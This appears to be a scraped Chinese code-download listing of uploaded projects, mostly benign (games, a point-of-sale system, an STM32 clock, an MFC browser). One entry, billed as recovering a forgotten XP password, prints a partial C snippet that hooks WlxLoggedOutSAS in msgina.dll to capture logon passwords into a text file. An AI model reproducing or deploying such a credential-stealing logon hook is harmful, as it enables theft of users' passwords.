-
This just a tank game example code
This just a tank game example code-This is just a tank game example code
- 2022-05-22 02:37:05下载
- 积分:1
-
一个简单的买卖点
该项目是自动控制和评估库存、 现金销售、 信用销售、 购买、 生成报告。
该数据库是 sql。
其简单和易于 cusstomize 或修改以满足客户的需要。
- 2022-06-03 13:55:34下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
基本功能描述24点游戏是一种常见的数学运算游戏,玩游戏者只需根据系统给出的四张1~9的纸牌算出24即可,而程序主要负责实现随机发牌、结果验算、计算得分和难度设置...
基本功能描述24点游戏是一种常见的数学运算游戏,玩游戏者只需根据系统给出的四张1~9的纸牌算出24即可,而程序主要负责实现随机发牌、结果验算、计算得分和难度设置等功能。-description:It s a common math game,the player should calculate the result,24 from the 4 cards ranged from 1 to 9 given by the software.The software implement shuffle,recalculate,show score and set the difficulty.
- 2022-03-15 08:21:53下载
- 积分:1
-
STM32实时显示时间,年月日时分秒都可分别显示
STM32实时显示时间,在串口屏显示,高效简洁,年月日时分秒都可分别显示,通过中断方式,程序简单明了,初学者即可读懂应用
- 2023-08-16 16:00:10下载
- 积分:1
-
请认真阅读您的文件包然后写出其具体功能(至少要20个字)。尽量不要让站长把时间都花费在为您修正说明上。压缩包解压时不能有密码...
请认真阅读您的文件包然后写出其具体功能(至少要20个字)。尽量不要让站长把时间都花费在为您修正说明上。压缩包解压时不能有密码-Please read them carefully before you write the document package to their specific functions (at least 20 words). Try not to let the station master at the time you spend on the amendment note. Package should not have a password when extracting
- 2022-02-06 21:59:22下载
- 积分:1
-
VC纯MFC编程实现浏览器(已美化)
纯MFC制作一个美化过的网页浏览器,有按钮自绘,无边框窗口美化实现,可以访问网页,支持自适应,有配置文件,VS2010的,不需要其他库。
- 2022-04-22 11:55:07下载
- 积分:1
-
small c compiler, suitable for windows environment that includes flex, and gener...
小型c编译器,适合windows环境,包含flex ,ya-small c compiler, suitable for windows environment that includes flex, and generates
- 2022-05-09 05:44:29下载
- 积分:1
-
简单的汉诺塔程序 用于的动态显示 排列过程
简单的汉诺塔程序 用于的动态显示 排列过程-Simple Tower of Hanoi program arranged for the dynamic display during
- 2022-04-09 16:10:22下载
- 积分:1
-
用VB6.0编写,演示弹出气泡(可输入气泡内容)、最小化到托盘功能,有详细的注释...
用VB6.0编写,演示弹出气泡(可输入气泡内容)、最小化到托盘功能,有详细的注释-Prepared using VB6.0, presentations pop bubbles (air bubbles can enter the content), to minimize to tray feature, there are detailed notes
- 2023-06-02 06:00:03下载
- 积分:1